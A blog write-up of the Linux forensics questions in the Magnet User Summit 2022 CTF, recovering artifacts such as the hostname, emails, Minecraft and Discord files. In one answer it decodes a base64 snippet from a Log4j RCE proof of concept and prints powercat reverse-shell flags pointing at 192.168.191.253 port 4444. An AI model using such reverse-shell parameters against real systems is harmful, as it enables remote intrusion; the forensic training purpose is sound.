Magnet User Summit 2022 CTF - Linux

Previous: Egg Hunt | iPhone

The last part of the MUS CTF was a Linux image. I will say that I have the least experience with Linux (still) so it was good to give it a go. Let's see how far the rabbit hole goes!

I use print statements for my logging

What is the name of the utility/library the user was looking at exploits for?

I looked through the web history and didn't see anything apparently relevant so I next just started scouring the file system and came across a screen shot at the following path:

home\rafael\Pictures\Screenshot from 2022-02-09 17-31-17.png

Figure 1: Screenshot of YouTube

You can see that the screenshot was of a Log4J exploit.

Mischievous Lemur

What is the version ID number of the operating system on the machine? format: XX.XX

In the file system you can find the answer fairly quickly at path:

usr\lib\os-release

You can see that the OS version ID was 21.10.

Figure 2: OS version in os-release

$whoami

What is the hostname of the computer?

Another fairly easy one if you know where to look. We can find the answer at:

etc\hostname

We can see the hostname was "rshell-lenovo".

Figure 3: hostname file info

A little blue birdie told me

What is one anime that the user likes?

Judging from the hint in the question title I knew Twitter was involved. A quick search for "anime" actually provided quick results in the email file at path:

home\rafael\.thunderbird\vrvcx2qf.default-release\ImapMail\imap.gmail.com\INBOX

In a Twitter email we can see that the user was interested in Attack On Titan.

Figure 4: Twitter email for anime accounts

Into the Matrix we go

What is the UUID for the attackers Minecraft account?

I knew right away I had to find the Minecraft folder and config details in the file system so it was time to dig. It didn't take long to find the user config at:

home\rafael\.minecraft\usercache.json

The JSON file had the UUID of 8b0dec19-b463-477e-9548-eef20c861492.

Figure 5: Minecraft user details

Be our guest

What was the user's first password for the guest wifi?

This was such an odd question so I did a quick search in AXIOM for "guest" and hit on some emails. Sorting by timestamp we see the first email had a password of "93483".

\home\rafael\.thunderbird\vrvcx2qf.default-release\ImapMail\imap.gmail.com\INBOX

Figure 6: Guest wifi password in email

Today's YouTube video is sponsored by...

What VPN client did the user install and use on the machine?

I struggled with this one initially because I did a quick search for VPN and found OpenVPN. It appeared to be installed and actually used but that was incorrect. So I went back to browser history to see if anything else was navigated to and saw a bunch of entries for Zerotier. We saw the download link and profile logins so went with that and it hit.

Figure 7: Zerotier search in AXIOM

We can see it was accessed in bash history too.

Figure 8: Bash history with Zerotier

If a picture is worth a thousand words how many is a video worth?

The user watched a video that premiered on Dec 11th 2021. How many views did it have when they watched it on February 9th?

I looked in web history and didn't see anything so I decided to look at the previous location where I found the last YouTube screenshot, and was successful. Found at the path was a video with 265,355 views:

home\rafael\Pictures\Screenshot from 2022-02-09 17-42-23.png

Figure 9: YouTube video premiere

I'm hungry for videos

What is the new channel name for the YouTuber who's cookbook is shown on the device?****

Another kind of weird question. I looked at web history again but didn't see anything so I went back to just exploring the file system. I came across another image file at:

home\rafael\marshalsec\poc\gYlgmvjs.jpeg

Figure 10: Binging with Babish book screenshot

The thumbnail shows a book by Babish, and doing a quick search we see his new channel is called "Babish Culinary Universe".

Figure 11: Babish YouTube page

Hunt the Wumpus

What is the module with the highest installed version for the chat application with the mascot Wumpus?

A quick Google search for Wumpus resulted in finding associations to Discord so I knew to look for any Discord files/folders on the file system. From looking through the file system I came across the file of interest:

home\rafael\.config\discord\0.0.16\modules\installed.json

We can see that the highest installed version was v5 for "discord_voice".

Figure 12: Installed modules for Discord

Never gonna give... up on this question

What is the upload date of the second youtube video on the channel where the user downloaded a youtube video from? (Format MM/DD/YYYY)

It was almost too obvious with this question clue, we were looking for any hints to Rick Astley's "Never Gonna Give You Up". There was a download file of the music video at:

home\rafael\Downloads\Rick Astley - Never Gonna Give You Up (Official Music Video).wav

If we go to the YouTube channel for Rick, the second video was uploaded on 10/25/2009.


Figure 13: Rick Astley video views

Buzzy Bees

What is the SHA-1 hash of the "latest" release of Minecraft according to the system? 

Another question to hunt through the file system. You can find a version file at the path:

home\rafael\.minecraft\versions\version_manifest_v2.json

We can see the latest release 22w06a had an SHA-1 hash of 3c6e119c0ff307accf31b596f9cd47ffa2ec6305.

Figure 14: Minecraft release SHA-1

It's raining ocelots and wolves

According to Windows, what was the temperature in fahrenheit on February 11th, 2022 at 6:30 PM? (Format: XXF | Example: 14F)

In the same folder we found the Babish image there was another screenshot. This one was of a Windows computer:

home\rafael\marshalsec\poc\YXvySdGd.jpeg

We can see the date in the bottom right was February 11 and in the bottom left the temperature was 45F.

Figure 15: Windows computer screenshot

The RCE is base(64)d on what?

What were the three flags and their values that were passed to powercat? The answer must be provided the same format as the command was entered. (For example if the command was "powercat -D Y -l a -n" the answer would be "-D Y -l a -n") 
 
A keyword search for "powercat" shows some hits in web history but the significant hit is in the bash history file.

home\rafael\.bash_history

Figure 16: Bash history for Rafael

The RCE appears to deal with the .java file for log4j edited later on in the bash history. 

home\rafael\marshalsec\poc\Log4jRCE.java

The question title gives us a clue for what we're looking for. We can see that a snippet of code in the file is encoded.

Figure 17: Log4jRCE.java in NotePad++

We can extract the encoded piece and drop it in CyberChef and decode it from Base64.

Figure 18: Encoded snippet in CyberChef

We see that answer was "-c 192.168.191.253 -p 4444 -e cmd".

Hello (New) World

How many dimensions (including the overworld) did the player travel to in the oldest of the worlds?

Other than knowing that this involved Minecraft I wasn't quite sure where to find the answer right away. Digging through the file system I came across some save folders that showed (of course) New World (see question title). We can tell by folder dates it was the older of the two.

Figure 19: Minecraft world folders

I figured out that this was the Java version by the folder structure so I could look up some further details on the Minecraft Wiki page. I didn't see references to dimensions but did see references to regions. Inside the "region" folder contained 4 .mca files. This folder refers to the Overworld. We also see folders for DIM-1 and DIM1 referring to The Nether and The End respectively. 

Figure 20: Minecraft dimensions

I believe the correct answer should be 6.

Matrix_1999 is the key!

What is the mojangClientToken stored in the keystore?

There were multiple ways that you could accomplish this one. You could copy the keyrings to another Linux VM and boot and unlock with the key (see question title).

home\rafael\.local\share\keyrings

The easier way is to convert the E01 to a VM and boot to it. Luckily I have the pro version of Arsenal Image Mounter so it does it automatically for us (a few other commercial tools do to). Once logged in using "Matrix_1999" as the password you can open the Settings > Passwords and Keys and see an entry for mojangClientToken at the bottom. Clicking the key unveils that the token was 2f76c8b04c004ddd888a05a6cad6be52.

Figure 21: mojangClientToken in E01 booted VM